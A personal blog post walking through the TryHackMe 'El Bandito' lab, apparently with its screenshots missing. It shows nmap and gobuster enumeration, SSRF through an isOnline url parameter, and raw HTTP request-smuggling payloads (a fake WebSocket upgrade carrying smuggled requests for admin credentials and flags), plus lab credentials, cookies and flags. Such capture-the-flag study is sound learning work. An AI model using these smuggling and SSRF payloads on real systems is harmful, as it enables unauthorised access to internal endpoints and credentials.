Skip to main content

Training Update v0.106

blank
blank

It’s Thursday and we are nearing the end of another week and we are nearing the end of the Web Application Pentesting pathway on THM!

We have one more challenge to complete which is the El Bandito room which looks like it’s going to be a bit of a tough one, but as always we shall persist even if we need to use a guide to get through it because it’s all about learning at the end of the day!

blank

nmap -sV -sC -p- 10.10.242.142 –vv

blank
blank

http://10.10.242.142:8080/

blank

http://10.10.242.142:8080/burn.html

blank

gobuster dir -u https://elbandito.thm:80 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k

blank

https://elbandito.thm:80

blank

view-source:https://elbandito.thm:80/

blank

blank

http://10.10.66.127:8080/info

blank

http://10.10.66.127:8080/assets

blank

http://10.10.66.127:8080/health

blank

http://10.10.66.127:8080/tokens

blank

Strange.. I saw a number before like 168.0 something..

GET /isOnline?url=http://10.11.125.150:8081/ HTTP/1.1
Host: 10.10.66.127:8080
Accept-Encoding: gzip, deflate, br
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0

blank
blank

http://elbandito.thm:8080/services.html

blank
GET /isOnline?url=http://10.11.125.150:5555 HTTP/1.1
Host: elbandito.thm:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 777
Origin: http://elbandito.thm:8080
Sec-WebSocket-Key: 3vSZkmbaX99FKC2xCUF+UA==
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Content-Length: 0
GET /trace HTTP/1.1
Host: elbandito.thm:8080
blank
GET /isOnline?url=http://10.11.125.150:5555 HTTP/1.1
Host: elbandito.thm:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 777
Origin: http://elbandito.thm:8080
Sec-WebSocket-Key: 3vSZkmbaX99FKC2xCUF+UA==
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Content-Length: 0
GET /admin-creds HTTP/1.1
Host: elbandito.thm:8080
blank

username:hAckLIEN password:YouCanCatchUsInYourDreams404

GET /isOnline?url=http://10.11.125.150:5555 HTTP/1.1
Host: elbandito.thm:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 777
Origin: http://elbandito.thm:8080
Sec-WebSocket-Key: 3vSZkmbaX99FKC2xCUF+UA==
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Content-Length: 0
GET /admin-flag HTTP/1.1
Host: elbandito.thm:8080
blank

Flag – THM{:::MY_DECLINATION:+62°_14\’_31.4”::}

https://elbandito.thm:80/access

blank

https://elbandito.thm:80/messages

blank
POST /send_message HTTP/2
Host: elbandito.thm:80
Cookie: session=eyJ1c2VybmFtZSI6ImhBY2tMSUVOIn0.aByhfg.cDEB1TU2DdwlyggZmQNLkvkulO8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://elbandito.thm:80/access
Dnt: 1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Length: 16
data=hello world
blank
blank
POST / HTTP/2
Host: elbandito.thm:80
Cookie: session=eyJ1c2VybmFtZSI6ImhBY2tMSUVOIn0.Z0CrHA.e5lrq5E_loCdjx8-xG7OUbDQMlQ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Length: 0
POST /send_message HTTP/1.1
Host: elbandito.thm:80
Cookie: session=eyJ1c2VybmFtZSI6ImhBY2tMSUVOIn0.Z0CrHA.e5lrq5E_loCdjx8-xG7OUbDQMlQ
Content-Type: application/x-www-form-urlencoded
Content-Length: 730
data=
blank

Flag – THM{¡!¡RIGHT_ASCENSION_12h_36m_25.46s!¡!}

blank
blank

Credit – https://0xb0b.gitbook.io/writeups/tryhackme/2024/el-bandito#a-smugglers-tale

Will come back to this room at a later date..

blank

This is stupid –

blank
blank
blank

Until next time & don’t sleepwalk through life!

Shalom